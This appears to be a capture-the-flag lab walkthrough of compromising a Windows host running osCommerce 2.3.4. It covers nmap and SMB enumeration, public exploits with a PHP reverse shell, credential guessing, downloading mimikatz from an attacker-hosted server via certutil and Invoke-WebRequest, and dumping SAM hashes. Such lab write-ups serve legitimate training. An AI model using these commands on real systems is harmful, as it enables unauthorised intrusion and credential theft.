[Enumeration]
- Port scanning
nmap -Pn <ip>
2. Service scanning
nmap -sV <ip>There’re 3 HTTP ports: 80, 443, and 8080.
3. Scan for SMB
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse <ip>There’re 5 shares that I can use: ADMIN$, C$, IPC$, Users, and Windows
There’re 3 users: Administrator, Guest, and Lab
4. Scan for vulnerabilities, there is something about “os commerce”. I think it’s interesting.
5. Access HTTP ports
port 80
http://<ip>
Port 443
https://<ip>
Port 8080
http://<ip>:8080
Port 443 and port 8080 is the same
access catalog/
access /docs
6. Directory fuzzing
dirb http://<ip>dirb https://<ip>dirb http://<ip>:8080
There’re results from port 8080.
Try access phpmyadmin
[Exploitation]
Search for osCommerce 2.3.4 exploits
searchsploit oscommerce 2.3.4There’re 2 python exploits.
Copy both of them
cp /usr/share/exploitdb/exploits/php/webapps/43191.py .cp /usr/share/exploitdb/exploits/php/webapps/44374.py .
- Let’s check 44374.py first, because it’s a remote code execution.
gedit 44374.pyReview the code, there’re 3 lines that I have to edit.
Input target IP and reverse shell command.
Create listener
nc -lvp 8080
Run exploit
python 44374.pyNothing happen.
Let’s review the code again. Access the path to check if it’s existed.
The real path is“http://<ip>:8080/oscommerce-2.3.4”.
LOL, I forget that it in port 8080 and path is “oscommerce-2.3.4” not “oscommerce-2.3.4.1”
Edit the code
Run the exploit
python 44374.py
Edit “system()”
Edit to use “exec()” instead, also it’s a window machine. I will use “dir” instead of “ls”.
Run the exploit
python 44374.pyNothing with dir
Change to “whoami”, still got nothing.
Let’s try reverse shell with powershell
Edit the code
Run the code, nothing happened
I’ll stop this for once. Let’s try other script.
2. Let’s try 43191.py, review the code first.
gedit 43191.py
Try to run the command
python 43191.py
python 43191.py -u http://<ip>:8080/oscommerce-2.3.4 --auth=admin:admin -f shell.phpSeems like I need the credential.
I remember from during the first exploit. It seems like the system installation is not complete yet.
Let’s guess for credentials
admin:admin -> failed
admin:password -> failed
admin: (no password) -> failed
root: (no password) -> successFail result.
Success result
Continue
Input the data
Run script again
python 43191.py -u http://<ip>:8080/oscommerce-2.3.4 --auth=admin:admin -f shell.phpI need PHP shell.
Let’s google “php shell for windows”. I find this one
https://github.com/Dhayalanb/windows-php-reverse-shell
git clone https://github.com/Dhayalanb/windows-php-reverse-shell.gitEdit and save as shell.php
Since the payload is encoded using base64, I don’t want to edit it.
Let’s find the simpler one. I came across to this.
https://gist.github.com/joswr1ght/22f40787de19d80d110b37fb79ac3985
Edit from system() to exec() instead
Run the script
python 43191.py -u http://<ip>:8080/oscommerce-2.3.4 --auth=admin:admin -f shell.php
Let’s try the reverse shell using power shell
I got the shell using the second command.
Finally!!! Now I have a shell.
[Question]
- “Lab” user NTML hash decrypted
Download mimikatz.exe
At our machine, mimikatz.exe directory
python -m SimpleHTTPServer
At shell
Invoke-WebRequest -OutFile mimikatz.exe http://<attacker ip>:<attacker port>/mimikatz.exeNothing happened
Try another command
certutil.exe -urlcache -f http://<attacker ip>:<attacker port>/mimikatz.exe mimikatz.exe
dir
Run mimikatz.exe
.\mimikatz "lsadump::sam" exit
Crack the hash with crackstation
2. root.txt
Search though Users directory. I found the file at “C:\Users\Administrator\Desktop”
dir
cat root.txt.txt
